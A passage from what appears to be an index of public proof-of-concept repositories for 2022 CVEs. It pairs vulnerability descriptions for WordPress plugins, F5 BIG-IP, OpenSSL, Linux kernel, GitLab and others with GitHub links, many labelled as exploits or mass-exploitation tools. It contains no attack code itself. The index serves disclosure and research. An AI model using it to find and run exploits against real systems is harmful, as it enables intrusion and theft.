The Content Mask WordPress plugin before 1.8.4.1 does not have authorisation and CSRF checks in various AJAX actions, and does not validate the option to be updated to ensure it belongs to the plugin. As a result, any authenticated user, such as a subscriber, could modify arbitrary blog options.

- [RandomRobbieBF/CVE-2022-1203](https://github.com/RandomRobbieBF/CVE-2022-1203)

### CVE-2022-1227 (2022-04-29)

A privilege escalation flaw was found in Podman. This flaw allows an attacker to publish a malicious image to a public registry. Once this image is downloaded by a potential victim, the vulnerability is triggered after a user runs the 'podman top' command. This action gives the attacker access to the host filesystem, leading to information disclosure or denial of service.

- [iridium-soda/CVE-2022-1227_Exploit](https://github.com/iridium-soda/CVE-2022-1227_Exploit)

### CVE-2022-1292 (2022-05-03)

The c_rehash script does not properly sanitise shell metacharacters to prevent command injection. This script is distributed by some operating systems in a manner where it is automatically executed. On such operating systems, an attacker could execute arbitrary commands with the privileges of the script. Use of the c_rehash script is considered obsolete and should be replaced by the OpenSSL rehash command line tool. Fixed in OpenSSL 3.0.3 (Affected 3.0.0,3.0.1,3.0.2). Fixed in OpenSSL 1.1.1o (Affected 1.1.1-1.1.1n). Fixed in OpenSSL 1.0.2ze (Affected 1.0.2-1.0.2zd).

- [li8u99/CVE-2022-1292](https://github.com/li8u99/CVE-2022-1292)
- [alcaparra/CVE-2022-1292](https://github.com/alcaparra/CVE-2022-1292)
- [rama291041610/CVE-2022-1292](https://github.com/rama291041610/CVE-2022-1292)
- [greek0x0/CVE-2022-1292](https://github.com/greek0x0/CVE-2022-1292)
- [und3sc0n0c1d0/CVE-2022-1292](https://github.com/und3sc0n0c1d0/CVE-2022-1292)

### CVE-2022-1329 (2022-04-19)

The Elementor Website Builder plugin for WordPress is vulnerable to unauthorized execution of several AJAX actions due to a missing capability check in the ~/core/app/modules/onboarding/module.php file that make it possible for attackers to modify site data in addition to uploading malicious files that can be used to obtain remote code execution, in versions 3.6.0 to 3.6.2.

- [AkuCyberSec/CVE-2022-1329-WordPress-Elementor-3.6.0-3.6.1-3.6.2-Remote-Code-Execution-Exploit](https://github.com/AkuCyberSec/CVE-2022-1329-WordPress-Elementor-3.6.0-3.6.1-3.6.2-Remote-Code-Execution-Exploit)
- [mcdulltii/CVE-2022-1329](https://github.com/mcdulltii/CVE-2022-1329)
- [Grazee/CVE-2022-1329-WordPress-Elementor-RCE](https://github.com/Grazee/CVE-2022-1329-WordPress-Elementor-RCE)
- [dexit/CVE-2022-1329](https://github.com/dexit/CVE-2022-1329)
- [phanthibichtram12/CVE-2022-1329](https://github.com/phanthibichtram12/CVE-2022-1329)
- [AgustinESI/CVE-2022-1329](https://github.com/AgustinESI/CVE-2022-1329)

### CVE-2022-1364 (2022-07-26)

Type confusion in V8 Turbofan in Google Chrome prior to 100.0.4896.127 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.

- [A1Lin/cve-2022-1364](https://github.com/A1Lin/cve-2022-1364)

### CVE-2022-1386 (2022-05-16)

The Fusion Builder WordPress plugin before 3.6.2, used in the Avada theme, does not validate a parameter in its forms which could be used to initiate arbitrary HTTP requests. The data returned is then reflected back in the application's response. This could be used to interact with hosts on the server's local network bypassing firewalls and access control measures.

- [ardzz/CVE-2022-1386](https://github.com/ardzz/CVE-2022-1386)
- [im-hanzou/fubucker](https://github.com/im-hanzou/fubucker)
- [zycoder0day/CVE-2022-1386-Mass_Vulnerability](https://github.com/zycoder0day/CVE-2022-1386-Mass_Vulnerability)
- [satyasai1460/CVE-2022-1386](https://github.com/satyasai1460/CVE-2022-1386)

### CVE-2022-1388 (2022-05-05)

On F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions, undisclosed requests may bypass iControl REST authentication. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.

- [numanturle/CVE-2022-1388](https://github.com/numanturle/CVE-2022-1388)
- [jheeree/CVE-2022-1388-checker](https://github.com/jheeree/CVE-2022-1388-checker)
- [MrCl0wnLab/Nuclei-Template-CVE-2022-1388-BIG-IP-iControl-REST-Exposed](https://github.com/MrCl0wnLab/Nuclei-Template-CVE-2022-1388-BIG-IP-iControl-REST-Exposed)
- [Osyanina/westone-CVE-2022-1388-scanner](https://github.com/Osyanina/westone-CVE-2022-1388-scanner)
- [doocop/CVE-2022-1388-EXP](https://github.com/doocop/CVE-2022-1388-EXP)
- [blind-intruder/CVE-2022-1388-RCE-checker-and-POC-Exploit](https://github.com/blind-intruder/CVE-2022-1388-RCE-checker-and-POC-Exploit)
- [Hudi233/CVE-2022-1388](https://github.com/Hudi233/CVE-2022-1388)
- [sherlocksecurity/CVE-2022-1388-Exploit-POC](https://github.com/sherlocksecurity/CVE-2022-1388-Exploit-POC)
- [yukar1z0e/CVE-2022-1388](https://github.com/yukar1z0e/CVE-2022-1388)
- [0xf4n9x/CVE-2022-1388](https://github.com/0xf4n9x/CVE-2022-1388)
- [alt3kx/CVE-2022-1388_PoC](https://github.com/alt3kx/CVE-2022-1388_PoC)
- [Vulnmachines/F5-Big-IP-CVE-2022-1388](https://github.com/Vulnmachines/F5-Big-IP-CVE-2022-1388)
- [ZephrFish/F5-CVE-2022-1388-Exploit](https://github.com/ZephrFish/F5-CVE-2022-1388-Exploit)
- [horizon3ai/CVE-2022-1388](https://github.com/horizon3ai/CVE-2022-1388)
- [Al1ex/CVE-2022-1388](https://github.com/Al1ex/CVE-2022-1388)
- [Henry4E36/CVE-2022-1388](https://github.com/Henry4E36/CVE-2022-1388)
- [savior-only/CVE-2022-1388](https://github.com/savior-only/CVE-2022-1388)
- [saucer-man/CVE-2022-1388](https://github.com/saucer-man/CVE-2022-1388)
- [superzerosec/CVE-2022-1388](https://github.com/superzerosec/CVE-2022-1388)
- [Stonzyy/Exploit-F5-CVE-2022-1388](https://github.com/Stonzyy/Exploit-F5-CVE-2022-1388)
- [MrCl0wnLab/Nuclei-Template-Exploit-F5-BIG-IP-iControl-REST-Auth-Bypass-RCE-Command-Parameter](https://github.com/MrCl0wnLab/Nuclei-Template-Exploit-F5-BIG-IP-iControl-REST-Auth-Bypass-RCE-Command-Parameter)
- [qusaialhaddad/F5-BigIP-CVE-2022-1388](https://github.com/qusaialhaddad/F5-BigIP-CVE-2022-1388)
- [chesterblue/CVE-2022-1388](https://github.com/chesterblue/CVE-2022-1388)
- [Angus-Team/F5-BIG-IP-RCE-CVE-2022-1388](https://github.com/Angus-Team/F5-BIG-IP-RCE-CVE-2022-1388)
- [LinJacck/CVE-2022-1388-EXP](https://github.com/LinJacck/CVE-2022-1388-EXP)
- [iveresk/cve-2022-1388-1veresk](https://github.com/iveresk/cve-2022-1388-1veresk)
- [shamo0/CVE-2022-1388](https://github.com/shamo0/CVE-2022-1388)
- [vesperp/CVE-2022-1388-F5-BIG-IP](https://github.com/vesperp/CVE-2022-1388-F5-BIG-IP)
- [thatonesecguy/CVE-2022-1388-Exploit](https://github.com/thatonesecguy/CVE-2022-1388-Exploit)
- [bandit92/CVE2022-1388_TestAPI](https://github.com/bandit92/CVE2022-1388_TestAPI)
- [0x7eTeam/CVE-2022-1388-PocExp](https://github.com/0x7eTeam/CVE-2022-1388-PocExp)
- [0xAgun/CVE-2022-1388](https://github.com/0xAgun/CVE-2022-1388)
- [AmirHoseinTangsiriNET/CVE-2022-1388-Scanner](https://github.com/AmirHoseinTangsiriNET/CVE-2022-1388-Scanner)
- [EvilLizard666/CVE-2022-1388](https://github.com/EvilLizard666/CVE-2022-1388)
- [mr-vill4in/CVE-2022-1388](https://github.com/mr-vill4in/CVE-2022-1388)
- [omnigodz/CVE-2022-1388](https://github.com/omnigodz/CVE-2022-1388)
- [pauloink/CVE-2022-1388](https://github.com/pauloink/CVE-2022-1388)
- [SecTheBit/CVE-2022-1388](https://github.com/SecTheBit/CVE-2022-1388)
- [Zeyad-Azima/CVE-2022-1388](https://github.com/Zeyad-Azima/CVE-2022-1388)
- [justakazh/CVE-2022-1388](https://github.com/justakazh/CVE-2022-1388)
- [PsychoSec2/CVE-2022-1388-POC](https://github.com/PsychoSec2/CVE-2022-1388-POC)
- [iveresk/cve-2022-1388-iveresk-command-shell](https://github.com/iveresk/cve-2022-1388-iveresk-command-shell)
- [Wrin9/CVE-2022-1388](https://github.com/Wrin9/CVE-2022-1388)
- [aancw/CVE-2022-1388-rs](https://github.com/aancw/CVE-2022-1388-rs)
- [west9b/F5-BIG-IP-POC](https://github.com/west9b/F5-BIG-IP-POC)
- [sashka3076/F5-BIG-IP-exploit](https://github.com/sashka3076/F5-BIG-IP-exploit)
- [Chocapikk/CVE-2022-1388](https://github.com/Chocapikk/CVE-2022-1388)
- [li8u99/CVE-2022-1388](https://github.com/li8u99/CVE-2022-1388)
- [electr0lulz/Mass-CVE-2022-1388](https://github.com/electr0lulz/Mass-CVE-2022-1388)
- [Luchoane/CVE-2022-1388_refresh](https://github.com/Luchoane/CVE-2022-1388_refresh)
- [jbharucha05/CVE-2022-1388](https://github.com/jbharucha05/CVE-2022-1388)
- [On-Cyber-War/CVE-2022-1388](https://github.com/On-Cyber-War/CVE-2022-1388)
- [forktheplanet/CVE-2022-1388](https://github.com/forktheplanet/CVE-2022-1388)
- [revanmalang/CVE-2022-1388](https://github.com/revanmalang/CVE-2022-1388)
- [amitlttwo/CVE-2022-1388](https://github.com/amitlttwo/CVE-2022-1388)
- [M4fiaB0y/CVE-2022-1388](https://github.com/M4fiaB0y/CVE-2022-1388)
- [devengpk/CVE-2022-1388](https://github.com/devengpk/CVE-2022-1388)
- [vaelwolf/CVE-2022-1388](https://github.com/vaelwolf/CVE-2022-1388)
- [j-baines/tippa-my-tongue](https://github.com/j-baines/tippa-my-tongue)
- [SudeepaShiranthaka/F5-BIG-IP-Remote-Code-Execution-Vulnerability-CVE-2022-1388-A-Case-Study](https://github.com/SudeepaShiranthaka/F5-BIG-IP-Remote-Code-Execution-Vulnerability-CVE-2022-1388-A-Case-Study)
- [battleofthebots/refresh](https://github.com/battleofthebots/refresh)
- [nvk0x/CVE-2022-1388-exploit](https://github.com/nvk0x/CVE-2022-1388-exploit)
- [nico989/CVE-2022-1388](https://github.com/nico989/CVE-2022-1388)
- [gotr00t0day/CVE-2022-1388](https://github.com/gotr00t0day/CVE-2022-1388)
- [impost0r/CVE-2022-1388](https://github.com/impost0r/CVE-2022-1388)

### CVE-2022-1421 (2022-06-06)

The Discy WordPress theme before 5.2 lacks CSRF checks in some AJAX actions, allowing an attacker to make a logged in admin change arbitrary 's settings including payment methods via a CSRF attack.

- [nb1b3k/CVE-2022-1421](https://github.com/nb1b3k/CVE-2022-1421)

### CVE-2022-1442 (2022-05-10)

The Metform WordPress plugin is vulnerable to sensitive information disclosure due to improper access control in the ~/core/forms/action.php file which can be exploited by an unauthenticated attacker to view all API keys and secrets of integrated third-party APIs like that of PayPal, Stripe, Mailchimp, Hubspot, HelpScout, reCAPTCHA and many more, in versions up to and including 2.1.3.

- [RandomRobbieBF/CVE-2022-1442](https://github.com/RandomRobbieBF/CVE-2022-1442)

### CVE-2022-1471 (2022-12-01)

SnakeYaml's Constructor() class does not restrict types which can be instantiated during deserialization. Deserializing yaml content provided by an attacker can lead to remote code execution. We recommend using SnakeYaml's SafeConstructor when parsing untrusted content to restrict deserialization. We recommend upgrading to version 2.0 and beyond.

- [1fabunicorn/SnakeYAML-CVE-2022-1471-POC](https://github.com/1fabunicorn/SnakeYAML-CVE-2022-1471-POC)
- [falconkei/snakeyaml_cve_poc](https://github.com/falconkei/snakeyaml_cve_poc)

### CVE-2022-1565 (2022-07-18)

The plugin WP All Import is vulnerable to arbitrary file uploads due to missing file type validation via the wp_all_import_get_gz.php file in versions up to, and including, 3.6.7. This makes it possible for authenticated attackers, with administrator level permissions and above, to upload arbitrary files on the affected sites server which may make remote code execution possible.

- [phanthibichtram12/CVE-2022-1565](https://github.com/phanthibichtram12/CVE-2022-1565)

### CVE-2022-1597 (2022-06-06)

The WPQA Builder WordPress plugin before 5.4, used as a companion for the Discy and Himer, does not sanitise and escape a parameter on its reset password form, which makes it possible to perform Reflected Cross-Site Scripting attacks.

- [V35HR4J/CVE-2022-1597](https://github.com/V35HR4J/CVE-2022-1597)

### CVE-2022-1598 (2022-06-06)

The WPQA Builder WordPress plugin before 5.5, which is a companion to the Discy and Himer, lacks authentication in a REST API endpoint, allowing unauthenticated users to discover private questions sent between users on the site.

- [V35HR4J/CVE-2022-1598](https://github.com/V35HR4J/CVE-2022-1598)

### CVE-2022-1609 (2024-01-16)

The School Management WordPress plugin before 9.9.7 contains an obfuscated backdoor injected in its license checking code that registers a REST API handler, allowing an unauthenticated attacker to execute arbitrary PHP code on the site.

- [savior-only/CVE-2022-1609](https://github.com/savior-only/CVE-2022-1609)
- [0xSojalSec/CVE-2022-1609](https://github.com/0xSojalSec/CVE-2022-1609)
- [0xSojalSec/-CVE-2022-1609](https://github.com/0xSojalSec/-CVE-2022-1609)
- [w4r3s/cve-2022-1609-exploit](https://github.com/w4r3s/cve-2022-1609-exploit)

### CVE-2022-1679 (2022-05-16)

A use-after-free flaw was found in the Linux kernel’s Atheros wireless adapter driver in the way a user forces the ath9k_htc_wait_for_target function to fail with some input messages. This flaw allows a local user to crash or potentially escalate their privileges on the system.

- [EkamSinghWalia/-Detection-and-Mitigation-for-CVE-2022-1679](https://github.com/EkamSinghWalia/-Detection-and-Mitigation-for-CVE-2022-1679)
- [ov3rwatch/Detection-and-Mitigation-for-CVE-2022-1679](https://github.com/ov3rwatch/Detection-and-Mitigation-for-CVE-2022-1679)

### CVE-2022-1802 (2022-12-22)

If an attacker was able to corrupt the methods of an Array object in JavaScript via prototype pollution, they could have achieved execution of attacker-controlled JavaScript code in a privileged context. This vulnerability affects Firefox ESR < 91.9.1, Firefox < 100.0.2, Firefox for Android < 100.3.0, and Thunderbird < 91.9.1.

- [mistymntncop/CVE-2022-1802](https://github.com/mistymntncop/CVE-2022-1802)

### CVE-2022-1903 (2022-06-27)

The ARMember WordPress plugin before 3.4.8 is vulnerable to account takeover (even of the administrator) due to missing nonce and authorization checks in an AJAX action available to unauthenticated users, allowing them to change the password of arbitrary users by knowing their username.

- [biulove0x/CVE-2022-1903](https://github.com/biulove0x/CVE-2022-1903)

### CVE-2022-1966
- [ASkyeye/CVE-2022-1966](https://github.com/ASkyeye/CVE-2022-1966)

### CVE-2022-1972
- [randorisec/CVE-2022-1972-infoleak-PoC](https://github.com/randorisec/CVE-2022-1972-infoleak-PoC)

### CVE-2022-2078 (2022-06-30)

A vulnerability was found in the Linux kernel's nft_set_desc_concat_parse() function. This flaw allows an attacker to trigger a buffer overflow via nft_set_desc_concat_parse(), causing a denial of service and possibly code execution.

- [delsploit/CVE-2022-2078](https://github.com/delsploit/CVE-2022-2078)

### CVE-2022-2097 (2022-07-05)

AES OCB mode for 32-bit x86 platforms using the AES-NI assembly optimised implementation will not encrypt the entirety of the data under some circumstances. This could reveal sixteen bytes of data that was preexisting in the memory that wasn't written. In the special case of "in place" encryption, sixteen bytes of the plaintext would be revealed. Since OpenSSL does not support OCB based cipher suites for TLS and DTLS, they are both unaffected. Fixed in OpenSSL 3.0.5 (Affected 3.0.0-3.0.4). Fixed in OpenSSL 1.1.1q (Affected 1.1.1-1.1.1p).

- [PeterThomasAwen/OpenSSLUpgrade1.1.1q-Ubuntu](https://github.com/PeterThomasAwen/OpenSSLUpgrade1.1.1q-Ubuntu)

### CVE-2022-2109
- [Vulnmachines/oracle-weblogic-CVE-2021-2109](https://github.com/Vulnmachines/oracle-weblogic-CVE-2021-2109)

### CVE-2022-2185 (2022-07-01)

A critical issue has been discovered in GitLab affecting all versions starting from 14.0 prior to 14.10.5, 15.0 prior to 15.0.4, and 15.1 prior to 15.1.1 where an authenticated user authorized to import projects could import a maliciously crafted project leading to remote code execution.

- [safe3s/CVE-2022-2185-poc](https://github.com/safe3s/CVE-2022-2185-poc)
- [ESUAdmin/CVE-2022-2185](https://github.com/ESUAdmin/CVE-2022-2185)

### CVE-2022-2274 (2022-07-01)

The OpenSSL 3.0.4 release introduced a serious bug in the RSA implementation for X86_64 CPUs supporting the AVX512IFMA instructions. This issue makes the RSA implementation with 2048 bit private keys incorrect on such machines and memory corruption will happen during the computation. As a consequence of the memory corruption an attacker may be able to trigger a remote code execution on the machine performing the computation. SSL/TLS servers or other servers using 2048 bit RSA private keys running on machines supporting AVX512IFMA instructions of the X86_64 architecture are affected by this issue.

- [Malwareman007/CVE-2022-2274](https://github.com/Malwareman007/CVE-2022-2274)
- [EkamSinghWalia/OpenSSL-Vulnerability-Detection-Script](https://github.com/EkamSinghWalia/OpenSSL-Vulnerability-Detection-Script)
- [DesmondSanctity/CVE-2022-2274](https://github.com/DesmondSanctity/CVE-2022-2274)

### CVE-2022-2333 (2022-09-16)

If an attacker manages to trick a valid user into loading a malicious DLL, the attacker may be able to achieve code execution in Honeywell SoftMaster version 4.51 application’s context and permissions.

- [shirouQwQ/CVE-2022-2333](https://github.com/shirouQwQ/CVE-2022-2333)

### CVE-2022-2414 (2022-07-29)

Access to external entities when parsing XML documents can lead to XML external entity (XXE) attacks. This flaw allows a remote attacker to potentially retrieve the content of arbitrary files by sending specially crafted HTTP requests.

- [superhac/CVE-2022-2414-POC](https://github.com/superhac/CVE-2022-2414-POC)
- [amitlttwo/CVE-2022-2414-Proof-Of-Concept](https://github.com/amitlttwo/CVE-2022-2414-Proof-Of-Concept)
- [satyasai1460/CVE-2022-2414](https://github.com/satyasai1460/CVE-2022-2414)
- [geniuszlyy/CVE-2022-2414](https://github.com/geniuszlyy/CVE-2022-2414)

### CVE-2022-2466 (2022-08-31)

It was found that Quarkus 2.10.x does not terminate the HTTP request header context, which may lead to unpredictable behavior.

- [yuxblank/CVE-2022-2466---Request-Context-not-terminated-with-GraphQL](https://github.com/yuxblank/CVE-2022-2466---Request-Context-not-terminated-with-GraphQL)

### CVE-2022-2546 (2023-02-02)

The All-in-One WP Migration WordPress plugin before 7.63 uses the wrong content type, and does not properly escape the response from the ai1wm_export AJAX action, allowing an attacker to craft a request that, when submitted by any visitor, will inject arbitrary HTML or JavaScript into the response that will be executed in the victim's session. Note: This requires knowledge of a static secret key.

- [OpenXP-Research/CVE-2022-2546](https://github.com/OpenXP-Research/CVE-2022-2546)

### CVE-2022-2586 (2024-01-08)

It was discovered that a nft object or expression could reference a nft set on a different nft table, leading to a use-after-free once that table was deleted.

- [aels/CVE-2022-2586-LPE](https://github.com/aels/CVE-2022-2586-LPE)
- [sniper404ghostxploit/CVE-2022-2586](https://github.com/sniper404ghostxploit/CVE-2022-2586)

### CVE-2022-2588 (2024-01-08)

It was discovered that the cls_route filter implementation in the Linux kernel would not remove an old filter from the hashtable before freeing it if its handle had the value 0.

- [Markakd/CVE-2022-2588](https://github.com/Markakd/CVE-2022-2588)
- [ASkyeye/2022-LPE-UAF](https://github.com/ASkyeye/2022-LPE-UAF)
- [pirenga/2022-LPE-UAF](https://github.com/pirenga/2022-LPE-UAF)
- [konoha279/2022-LPE-UAF](https://github.com/konoha279/2022-LPE-UAF)
- [PolymorphicOpcode/CVE-2022-2588](https://github.com/PolymorphicOpcode/CVE-2022-2588)
- [BassamGraini/CVE-2022-2588](https://github.com/BassamGraini/CVE-2022-2588)
- [veritas501/CVE-2022-2588](https://github.com/veritas501/CVE-2022-2588)
- [dom4570/CVE-2022-2588](https://github.com/dom4570/CVE-2022-2588)

### CVE-2022-2590 (2022-08-31)

A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only shared memory mappings. This flaw allows an unprivileged, local user to gain write access to read-only memory mappings, increasing their privileges on the system.

- [hyeonjun17/CVE-2022-2590-analysis](https://github.com/hyeonjun17/CVE-2022-2590-analysis)

### CVE-2022-2602 (2024-01-08)

io_uring UAF, Unix SCM garbage collection

- [LukeGix/CVE-2022-2602](https://github.com/LukeGix/CVE-2022-2602)
- [kiks7/CVE-2022-2602-Kernel-Exploit](https://github.com/kiks7/CVE-2022-2602-Kernel-Exploit)
- [th3-5had0w/CVE-2022-2602-Study](https://github.com/th3-5had0w/CVE-2022-2602-Study)

### CVE-2022-2639 (2022-09-01)

An integer coercion error was found in the openvswitch kernel module. Given a sufficiently large number of actions, while copying and reserving memory for a new action of a new flow, the reserve_sfa_size() function does not return -EMSGSIZE as expected, potentially leading to an out-of-bounds write access. This flaw allows a local user to crash or potentially escalate their privileges on the system.

- [bb33bb/CVE-2022-2639-PipeVersion](https://github.com/bb33bb/CVE-2022-2639-PipeVersion)
- [EkamSinghWalia/Detection-and-Mitigation-for-CVE-2022-2639](https://github.com/EkamSinghWalia/Detection-and-Mitigation-for-CVE-2022-2639)
- [letsr00t/-2022-LOCALROOT-CVE-2022-2639](https://github.com/letsr00t/-2022-LOCALROOT-CVE-2022-2639)
- [devetop/CVE-2022-2639-PipeVersion](https://github.com/devetop/CVE-2022-2639-PipeVersion)

### CVE-2022-2884 (2022-10-17)

A vulnerability in GitLab CE/EE affecting all versions from 11.3.4 prior to 15.1.5, 15.2 to 15.2.3, 15.3 to 15.3.1 allows an authenticated user to achieve remote code execution via the Import from GitHub API endpoint.

- [m3ssap0/gitlab_rce_cve-2022-2884](https://github.com/m3ssap0/gitlab_rce_cve-2022-2884)

### CVE-2022-2992 (2022-10-17)

A vulnerability in GitLab CE/EE affecting all versions from 11.10 prior to 15.1.6, 15.2 to 15.2.4, 15.3 to 15.3.2 allows an authenticated user to achieve remote code execution via the Import from GitHub API endpoint.

- [CsEnox/CVE-2022-2992](https://github.com/CsEnox/CVE-2022-2992)
- [Malwareman007/CVE-2022-2992](https://github.com/Malwareman007/CVE-2022-2992)

### CVE-2022-3168
- [irsl/CVE-2022-3168-adb-unexpected-reverse-forwards](https://github.com/irsl/CVE-2022-3168-adb-unexpected-reverse-forwards)

### CVE-2022-3172 (2023-11-03)

A security issue was discovered in kube-apiserver that allows an aggregated API server to redirect client traffic to any URL. This could lead to the client performing unexpected actions as well as forwarding the client's API server credentials to third parties.

- [UgOrange/CVE-2022-3172](https://github.com/UgOrange/CVE-2022-3172)

### CVE-2022-3317 (2022-11-01)

Insufficient validation of untrusted input in Intents in Google Chrome on Android prior to 106.0.5249.62 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page. (Chromium security severity: Low)

- [hfh86/CVE-2022-3317](https://github.com/hfh86/CVE-2022-3317)

### CVE-2022-3328 (2024-01-08)

Race condition in snap-confine's must_mkdir_and_open_with_perms()

- [Mr-xn/CVE-2022-3328](https://github.com/Mr-xn/CVE-2022-3328)

### CVE-2022-3357 (2022-10-31)

The Smart Slider 3 WordPress plugin before 3.5.1.11 unserialises the content of an imported file, which could lead to PHP object injection issues when a user imports (intentionally or not) a malicious file, and a suitable gadget chain is present on the site.

- [iamz24/CVE-2021-3493_CVE-2022-3357](https://github.com/iamz24/CVE-2021-3493_CVE-2022-3357)

### CVE-2022-3368 (2022-10-17)

A vulnerability within the Software Updater functionality of Avira Security for Windows allowed an attacker with write access to the filesystem, to escalate his privileges in certain scenarios. The issue was fixed with Avira Security version 1.1.72.30556.

- [Wh04m1001/CVE-2022-3368](https://github.com/Wh04m1001/CVE-2022-3368)
- [byt3n33dl3/CrackAVFee](https://github.com/byt3n33dl3/CrackAVFee)

### CVE-2022-3464 (2022-10-12)

A vulnerability classified as problematic has been found in puppyCMS up to 5.1. This affects an unknown part of the file /admin/settings.php. The manipulation of the argument site_name leads to cross site scripting. It is possible to initiate the attack remotely. The associated identifier of this vulnerability is VDB-210699.

- [GYLQ/CVE-2022-3464](https://github.com/GYLQ/CVE-2022-3464)

### CVE-2022-3518 (2022-10-15)

A vulnerability classified as problematic has been found in SourceCodester Sanitization Management System 1.0. Affected is an unknown function of the component User Creation Handler. The manipulation of the argument First Name/Middle Name/Last Name leads to cross site scripting. It is possible to launch the attack remotely. VDB-211014 is the identifier assigned to this vulnerability.

- [lohith19/CVE-2022-3518](https://github.com/lohith19/CVE-2022-3518)

### CVE-2022-3546 (2022-10-17)

A vulnerability was found in SourceCodester Simple Cold Storage Management System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /csms/admin/?page=user/list of the component Create User Handler. The manipulation of the argument First Name/Last Name leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-211046 is the identifier assigned to this vulnerability.

- [thehackingverse/CVE-2022-3546](https://github.com/thehackingverse/CVE-2022-3546)

### CVE-2022-3552 (2022-10-17)

Unrestricted Upload of File with Dangerous Type in GitHub repository boxbilling/boxbilling prior to 0.0.1.

- [kabir0x23/CVE-2022-3552](https://github.com/kabir0x23/CVE-2022-3552)

### CVE-2022-3564 (2022-10-17)

A vulnerability classified as critical was found in Linux Kernel. Affected by this vulnerability is the function l2cap_reassemble_sdu of the file net/bluetooth/l2cap_core.c of the component Bluetooth. The manipulation leads to use after free. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-211087.

- [Trinadh465/linux-4.1.15_CVE-2022-3564](https://github.com/Trinadh465/linux-4.1.15_CVE-2022-3564)

### CVE-2022-3590 (2022-12-14)

WordPress is affected by an unauthenticated blind SSRF in the pingback feature. Because of a TOCTOU race condition between the validation checks and the HTTP request, attackers can reach internal hosts that are explicitly forbidden.

- [hxlxmjxbbxs/CVE-2022-3590-WordPress-Vulnerability-Scanner](https://github.com/hxlxmjxbbxs/CVE-2022-3590-WordPress-Vulnerability-Scanner)
- [huynhvanphuc/CVE-2022-3590-WordPress-Vulnerability-Scanner](https://github.com/huynhvanphuc/CVE-2022-3590-WordPress-Vulnerability-Scanner)

### CVE-2022-3602 (2022-11-01)

A buffer overrun can be triggered in X.509 certificate verification, specifically in name constraint checking. Note that this occurs after certificate chain signature verification and requires either a CA to have signed the malicious certificate or for the application to continue certificate verification despite failure to construct a path to a trusted issuer. An attacker can craft a malicious email address to overflow four attacker-controlled bytes on the stack. This buffer overflow could result in a crash (causing a denial of service) or potentially remote code execution. Many platforms implement stack overflow protections which would mitigate against the risk of remote code execution. The risk may be further mitigated based on stack layout for any given platform/compiler. Pre-announcements of CVE-2022-3602 described this issue as CRITICAL. Further analysis based on some of the mitigating factors described above have led this to be downgraded to HIGH. Users are still encouraged to upgrade to a new version as soon as possible. In a TLS client, this can be triggered by connecting to a malicious server. In a TLS server, this can be triggered if the server requests client authentication and a malicious client connects. Fixed in OpenSSL 3.0.7 (Affected 3.0.0,3.0.1,3.0.2,3.0.3,3.0.4,3.0.5,3.0.6).

- [NCSC-NL/OpenSSL-2022](https://github.com/NCSC-NL/OpenSSL-2022)
- [colmmacc/CVE-2022-3602](https://github.com/colmmacc/CVE-2022-3602)
- [eatscrayon/CVE-2022-3602-poc](https://github.com/eatscrayon/CVE-2022-3602-poc)
- [attilaszia/cve-2022-3602](https://github.com/attilaszia/cve-2022-3602)
- [alicangnll/SpookySSL-Scanner](https://github.com/alicangnll/SpookySSL-Scanner)
- [rbowes-r7/cve-2022-3602-and-cve-2022-3786-openssl-poc](https://github.com/rbowes-r7/cve-2022-3602-and-cve-2022-3786-openssl-poc)
- [corelight/CVE-2022-3602](https://github.com/corelight/CVE-2022-3602)
- [cybersecurityworks553/CVE-2022-3602-and-CVE-2022-3786](https://github.com/cybersecurityworks553/CVE-2022-3602-and-CVE-2022-3786)

### CVE-2022-3656 (2022-11-01)

Insufficient data validation in File System in Google Chrome prior to 107.0.5304.62 allowed a remote attacker to bypass file system restrictions via a crafted HTML page. (Chromium security severity: Medium)

- [momika233/CVE-2022-3656](https://github.com/momika233/CVE-2022-3656)

### CVE-2022-3699 (2023-10-24)

A privilege escalation vulnerability was reported in the Lenovo HardwareScanPlugin prior to version 1.3.1.2 and Lenovo Diagnostics prior to version 4.45 that could allow a local user to execute code with elevated privileges.

- [alfarom256/CVE-2022-3699](https://github.com/alfarom256/CVE-2022-3699)
- [estimated1337/lenovo_exec](https://github.com/estimated1337/lenovo_exec)
- [Eap2468/CVE-2022-3699](https://github.com/Eap2468/CVE-2022-3699)

### CVE-2022-3786 (2022-11-01)

A buffer overrun can be triggered in X.509 certificate verification, specifically in name constraint checking. Note that this occurs after certificate chain signature verification and requires either a CA to have signed a malicious certificate or for an application to continue certificate verification despite failure to construct a path to a trusted issuer. An attacker can craft a malicious email address in a certificate to overflow an arbitrary number of bytes containing the '.' character (decimal 46) on the stack. This buffer overflow could result in a crash (causing a denial of service). In a TLS client, this can be triggered by connecting to a malicious server. In a TLS server, this can be triggered if the server requests client authentication and a malicious client connects.

- [WhatTheFuzz/openssl-fuzz](https://github.com/WhatTheFuzz/openssl-fuzz)

### CVE-2022-3904 (2023-01-16)

The MonsterInsights WordPress plugin before 8.9.1 does not sanitize or escape page titles in the top posts/pages section, allowing an unauthenticated attacker to inject arbitrary web scripts into the titles by spoofing requests to google analytics.

- [RandomRobbieBF/CVE-2022-3904](https://github.com/RandomRobbieBF/CVE-2022-3904)

### CVE-2022-3910 (2022-11-22)

Use After Free vulnerability in Linux Kernel allows Privilege Escalation. An improper Update of Reference Count in io_uring leads to Use-After-Free and Local Privilege Escalation. When io_msg_ring was invoked with a fixed file, it called io_fput_file() which improperly decreased its reference count (leading to Use-After-Free and Local Privilege Escalation). Fixed files are permanently registered to the ring, and should not be put separately. We recommend upgrading past commit https://github.com/torvalds/linux/commit/fc7222c3a9f56271fba02aabbfbae999042f1679

- [veritas501/CVE-2022-3910](https://github.com/veritas501/CVE-2022-3910)
- [TLD1027/CVE-2022-3910](https://github.com/TLD1027/CVE-2022-3910)

### CVE-2022-3942 (2022-11-11)

